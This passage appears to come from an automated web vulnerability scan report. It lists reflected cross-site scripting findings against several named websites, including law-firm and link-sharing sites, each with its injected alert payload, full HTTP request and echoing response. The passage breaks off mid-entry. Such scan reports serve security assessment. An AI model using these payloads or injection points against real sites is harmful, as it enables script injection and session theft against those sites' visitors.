<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head><meta content="text/html; cha
...[SNIP]...
<a href="/BibtexHandler7912f"><script>alert(1)</script>ffb7212d2e4?lang=de">
...[SNIP]...

4.84. http://www.blurpalicious.com/submit/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.blurpalicious.com
Path:   /submit/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bbc96"style%3d"x%3aexpression(alert(1))"9670aa4b70 was submitted in the REST URL parameter 1. This input was echoed as bbc96"style="x:expression(alert(1))"9670aa4b70 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /submitbbc96"style%3d"x%3aexpression(alert(1))"9670aa4b70/ HTTP/1.1
Host: www.blurpalicious.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 14:21:22 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.16
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=d4f1d7c3f1f6f498ed8932dfa3207b2f; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 20463


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html dir="ltr" xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
...[SNIP]...
<meta name="keywords" content="submitbbc96"style="x:expression(alert(1))"9670aa4b70 online, submitbbc96"style="x:expression(alert(1))"9670aa4b70 review, submitbbc96"style="x:expression(alert(1))"9670aa4b70 free, submitbbc96"style="x:expression(alert(1))"9670aa4b70 information, submit
...[SNIP]...

4.85. http://www.brownrudnick.com/bio/srchrslt_alpha.asp [LName parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.brownrudnick.com
Path:   /bio/srchrslt_alpha.asp

Issue detail

The value of the LName request parameter is copied into the HTML document as plain text between tags. The payload 2273c<script>alert(1)</script>da3fa89dfa4 was submitted in the LName parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bio/srchrslt_alpha.asp?LName=A2273c<script>alert(1)</script>da3fa89dfa4 HTTP/1.1
Host: www.brownrudnick.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ASPSESSIONIDSSSASTRS=FHKLAMJAAMPCLADDLOGDPJOG;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Sat, 16 Apr 2011 15:07:33 GMT
X-Powered-By: ASP.NET
MicrosoftOfficeWebServer: 5.0_Pub
Connection: close
Content-Length: 11529
Content-Type: text/html
Cache-control: private

<html>

<head>

<meta http-equiv="Content-Language" content="en-us">

<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<title>Brown Rudnick - Professional Directory</t
...[SNIP]...
<b> &quot;A2273c<script>alert(1)</script>da3fa89dfa4&quot;</b>
...[SNIP]...

4.86. http://www.brownrudnick.com/disc/cntcdisclaimer.asp [ID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.brownrudnick.com
Path:   /disc/cntcdisclaimer.asp

Issue detail

The value of the ID request parameter is copied into the HTML document as plain text between tags. The payload cf64e<script>alert(1)</script>e02f267a586 was submitted in the ID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /disc/cntcdisclaimer.asp?ID=461cf64e<script>alert(1)</script>e02f267a586 HTTP/1.1
Host: www.brownrudnick.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ASPSESSIONIDSSSASTRS=FHKLAMJAAMPCLADDLOGDPJOG;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Sat, 16 Apr 2011 15:09:56 GMT
X-Powered-By: ASP.NET
MicrosoftOfficeWebServer: 5.0_Pub
Connection: close
Content-Length: 12696
Content-Type: text/html
Cache-control: private

<html>

<head>

<meta http-equiv="Content-Language" content="en-us">

<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<title>Brown Rudnick - Notice</title>
<link rel
...[SNIP]...
</i> [Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in query expression '(ID = 461cf64e<script>alert(1)</script>e02f267a586)'.<br>
...[SNIP]...

4.87. http://www.brownrudnick.com/nr/articlesIndv.asp [ID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.brownrudnick.com
Path:   /nr/articlesIndv.asp

Issue detail

The value of the ID request parameter is copied into the HTML document as plain text between tags. The payload f0bd0<script>alert(1)</script>ba5591b9a23 was submitted in the ID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /nr/articlesIndv.asp?ID=554f0bd0<script>alert(1)</script>ba5591b9a23 HTTP/1.1
Host: www.brownrudnick.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ASPSESSIONIDSSSASTRS=FHKLAMJAAMPCLADDLOGDPJOG;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Sat, 16 Apr 2011 14:47:37 GMT
X-Powered-By: ASP.NET
MicrosoftOfficeWebServer: 5.0_Pub
Connection: close
Content-Length: 11223
Content-Type: text/html
Cache-control: private

<html>

<head>

<meta http-equiv="Content-Language" content="en-us">

<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<title>Brown Rudnick - Articles</title>
<link r
...[SNIP]...
</i> [Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in query expression '(ID = 554f0bd0<script>alert(1)</script>ba5591b9a23)'.<br>
...[SNIP]...

4.88. http://www.colivia.de/submit.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.colivia.de
Path:   /submit.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8f132"%20style%3dx%3aexpression(alert(1))%207970fd9dcc1 was submitted in the REST URL parameter 1. This input was echoed as 8f132\" style=x:expression(alert(1)) 7970fd9dcc1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /submit.php8f132"%20style%3dx%3aexpression(alert(1))%207970fd9dcc1 HTTP/1.1
Host: www.colivia.de
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 14:22:12 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/5.2.17
Set-Cookie: PHPSESSID=d4fbc49fd988d8deff16e4092aa20bc6; path=/
Connection: close
Content-Type: text/html
Content-Length: 13901


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html dir="ltr" xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
...[SNIP]...
<a href="/upcoming.php?category=submit.php8f132\" style=x:expression(alert(1)) 7970fd9dcc1">
...[SNIP]...

4.89. http://www.deweyleboeuf.com/en/Firm/MediaCenter/PressReleases.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.deweyleboeuf.com
Path:   /en/Firm/MediaCenter/PressReleases.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 14c61"><script>alert(1)</script>6973c4e8044 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/Firm/MediaCenter/PressReleases.aspx?14c61"><script>alert(1)</script>6973c4e8044=1 HTTP/1.1
Host: www.deweyleboeuf.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=86622477.1302961759.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=86622477.1300520895.1302961759.1302961759.1302961759.1; __utmc=86622477; __utmb=86622477.1.10.1302961759; ASP.NET_SessionId=rcsrgderh04wwm5500gzommn;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 16 Apr 2011 15:42:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: website#lang=en; path=/
Cache-Control: no-cache, no-store
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 89927


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<meta http-equiv="conten
...[SNIP]...
<a href="?14c61"><script>alert(1)</script>6973c4e8044=1&pg=1">
...[SNIP]...

4.90. http://www.deweyleboeuf.com/en/Ideas/ClientAlerts.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.deweyleboeuf.com
Path:   /en/Ideas/ClientAlerts.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2e2cd"><script>alert(1)</script>6a3943ac963 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/Ideas/ClientAlerts.aspx?2e2cd"><script>alert(1)</script>6a3943ac963=1 HTTP/1.1
Host: www.deweyleboeuf.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=86622477.1302961759.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=86622477.1300520895.1302961759.1302961759.1302961759.1; __utmc=86622477; __utmb=86622477.1.10.1302961759; ASP.NET_SessionId=rcsrgderh04wwm5500gzommn;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 16 Apr 2011 15:43:21 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: website#lang=en; path=/
Cache-Control: no-cache, no-store
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 78019


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<meta http-equiv="conten
...[SNIP]...
<a href="?2e2cd"><script>alert(1)</script>6a3943ac963=1&pg=1">
...[SNIP]...

4.91. http://www.deweyleboeuf.com/en/Ideas/Events.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.deweyleboeuf.com
Path:   /en/Ideas/Events.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9e4bd"><script>alert(1)</script>7eca4c40787 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/Ideas/Events.aspx?9e4bd"><script>alert(1)</script>7eca4c40787=1 HTTP/1.1
Host: www.deweyleboeuf.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=86622477.1302961759.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=86622477.1300520895.1302961759.1302961759.1302961759.1; __utmc=86622477; __utmb=86622477.1.10.1302961759; ASP.NET_SessionId=rcsrgderh04wwm5500gzommn;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 16 Apr 2011 15:43:49 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: website#lang=en; path=/
Cache-Control: no-cache, no-store
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 92994


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<meta http-equiv="conten
...[SNIP]...
<a href="?9e4bd"><script>alert(1)</script>7eca4c40787=1&pg=1">
...[SNIP]...

4.92. http://www.deweyleboeuf.com/en/Ideas/Events/EventArchive.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.deweyleboeuf.com
Path:   /en/Ideas/Events/EventArchive.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5d0c5"><script>alert(1)</script>4b948308b21 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/Ideas/Events/EventArchive.aspx?5d0c5"><script>alert(1)</script>4b948308b21=1 HTTP/1.1
Host: www.deweyleboeuf.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=86622477.1302961759.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=86622477.1300520895.1302961759.1302961759.1302961759.1; __utmc=86622477; __utmb=86622477.1.10.1302961759; ASP.NET_SessionId=rcsrgderh04wwm5500gzommn;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 16 Apr 2011 15:44:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: website#lang=en; path=/
Cache-Control: no-cache, no-store
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 92673


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<meta http-equiv="conten
...[SNIP]...
<a href="?5d0c5"><script>alert(1)</script>4b948308b21=1&pg=1">
...[SNIP]...

4.93. http://www.deweyleboeuf.com/en/Ideas/InTheNews.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.deweyleboeuf.com
Path:   /en/Ideas/InTheNews.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5044b"><script>alert(1)</script>1fae55877d0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/Ideas/InTheNews.aspx?5044b"><script>alert(1)</script>1fae55877d0=1 HTTP/1.1
Host: www.deweyleboeuf.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=86622477.1302961759.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=86622477.1300520895.1302961759.1302961759.1302961759.1; __utmc=86622477; __utmb=86622477.1.10.1302961759; ASP.NET_SessionId=rcsrgderh04wwm5500gzommn;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 16 Apr 2011 15:43:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: website#lang=en; path=/
Cache-Control: no-cache, no-store
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 77557


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<meta http-equiv="conten
...[SNIP]...
<a href="?5044b"><script>alert(1)</script>1fae55877d0=1&pg=1">
...[SNIP]...

4.94. http://www.deweyleboeuf.com/en/Ideas/Publications/AttorneyArticles.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.deweyleboeuf.com
Path:   /en/Ideas/Publications/AttorneyArticles.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7176a"><script>alert(1)</script>129891fa40c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/Ideas/Publications/AttorneyArticles.aspx?7176a"><script>alert(1)</script>129891fa40c=1 HTTP/1.1
Host: www.deweyleboeuf.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=86622477.1302961759.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=86622477.1300520895.1302961759.1302961759.1302961759.1; __utmc=86622477; __utmb=86622477.1.10.1302961759; ASP.NET_SessionId=rcsrgderh04wwm5500gzommn;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 16 Apr 2011 15:43:38 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: website#lang=en; path=/
Cache-Control: no-cache, no-store
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 77733


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<meta http-equiv="conten
...[SNIP]...
<a href="?7176a"><script>alert(1)</script>129891fa40c=1&pg=1">
...[SNIP]...

4.95. http://www.diggita.it/submit.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.diggita.it
Path:   /submit.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fce1b"><script>alert(1)</script>c501a948188 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /submit.phpfce1b"><script>alert(1)</script>c501a948188 HTTP/1.1
Host: www.diggita.it
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 17 Apr 2011 14:21:34 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.3.3
X-Powered-By: PHP/5.3.3
Set-Cookie: PHPSESSID=67c03560314d0d10e9be0bd654435e86; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 25421


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="it" lang="it" xmlns:fb
...[SNIP]...
<fb:login-button v="2" onlogin="window.location.href='/modules/fb/login.php?return=/submit.phpfce1b"><script>alert(1)</script>c501a948188'">
...[SNIP]...

4.96. http://www.diggita.it/submit.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.diggita.it
Path:   /submit.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5ffb6"><script>alert(1)</script>5c2ce711f18 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /submit.php?5ffb6"><script>alert(1)</script>5c2ce711f18=1 HTTP/1.1
Host: www.diggita.it
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 14:21:33 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.3.3
X-Powered-By: PHP/5.3.3
Set-Cookie: PHPSESSID=ccd9b1d9e9471da4ea8841848718301e; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 26642


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="it" lang="it" xmlns:fb
...[SNIP]...
<fb:login-button v="2" onlogin="window.location.href='/modules/fb/login.php?return=/login.php?return=/submit.php?5ffb6"><script>alert(1)</script>5c2ce711f18=1'">
...[SNIP]...

4.97. http://www.embarkons.com/sharer.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.embarkons.com
Path:   /sharer.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 12956<img%20src%3da%20onerror%3dalert(1)>9574d4dbe79 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 12956<img src=a onerror=alert(1)>9574d4dbe79 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sharer.php/12956<img%20src%3da%20onerror%3dalert(1)>9574d4dbe79 HTTP/1.1
Host: www.embarkons.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 14:14:50 GMT
Server: Apache/2.0.54 (Fedora)
X-Powered-By: PHP/5.0.4
Set-Cookie: PHPSESSID=oe5lalcmiqfs2uf70pbbndtm97; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: projectlist=momentum; expires=Sun, 01 May 2011 14:14:50 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 22664

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<div id="pagename" style="display:none;">12956<img src=a onerror=alert(1)>9574d4dbe79</div>
...[SNIP]...

4.98. http://www.embarkons.com/sharer.php/a [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.embarkons.com
Path:   /sharer.php/a

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 87967<img%20src%3da%20onerror%3dalert(1)>88c35fcade8 was submitted in the REST URL parameter 2. This input was echoed as 87967<img src=a onerror=alert(1)>88c35fcade8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sharer.php/a87967<img%20src%3da%20onerror%3dalert(1)>88c35fcade8 HTTP/1.1
Host: www.embarkons.com
Proxy-Connection: keep-alive
Referer: http://www.embarkons.com/sharer.php/12956%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E9574d4dbe79
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=509jmnjagef2bl6d129sbvo1n7; projectlist=momentum

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 14:48:50 GMT
Server: Apache/2.0.54 (Fedora)
X-Powered-By: PHP/5.0.4
Set-Cookie: PHPSESSID=509jmnjagef2bl6d129sbvo1n7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: projectlist=momentum; expires=Sun, 01 May 2011 14:48:51 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 22665

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<div id="pagename" style="display:none;">a87967<img src=a onerror=alert(1)>88c35fcade8</div>
...[SNIP]...

4.99. http://www.embarkons.com/sharer.php/images/close-icon.gif [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.embarkons.com
Path:   /sharer.php/images/close-icon.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 4bc6e<img%20src%3da%20onerror%3dalert(1)>2f3138d923a was submitted in the REST URL parameter 3. This input was echoed as 4bc6e<img src=a onerror=alert(1)>2f3138d923a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sharer.php/images/close-icon.gif4bc6e<img%20src%3da%20onerror%3dalert(1)>2f3138d923a HTTP/1.1
Host: www.embarkons.com
Proxy-Connection: keep-alive
Referer: http://www.embarkons.com/sharer.php/12956%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E9574d4dbe79
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=509jmnjagef2bl6d129sbvo1n7; projectlist=momentum

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 14:48:53 GMT
Server: Apache/2.0.54 (Fedora)
X-Powered-By: PHP/5.0.4
Set-Cookie: PHPSESSID=509jmnjagef2bl6d129sbvo1n7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: projectlist=momentum; expires=Sun, 01 May 2011 14:48:54 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 22678

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<div id="pagename" style="display:none;">close-icon.gif4bc6e<img src=a onerror=alert(1)>2f3138d923a</div>
...[SNIP]...

4.100. http://www.embarkons.com/sharer.php/images/postit-bulb.gif [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
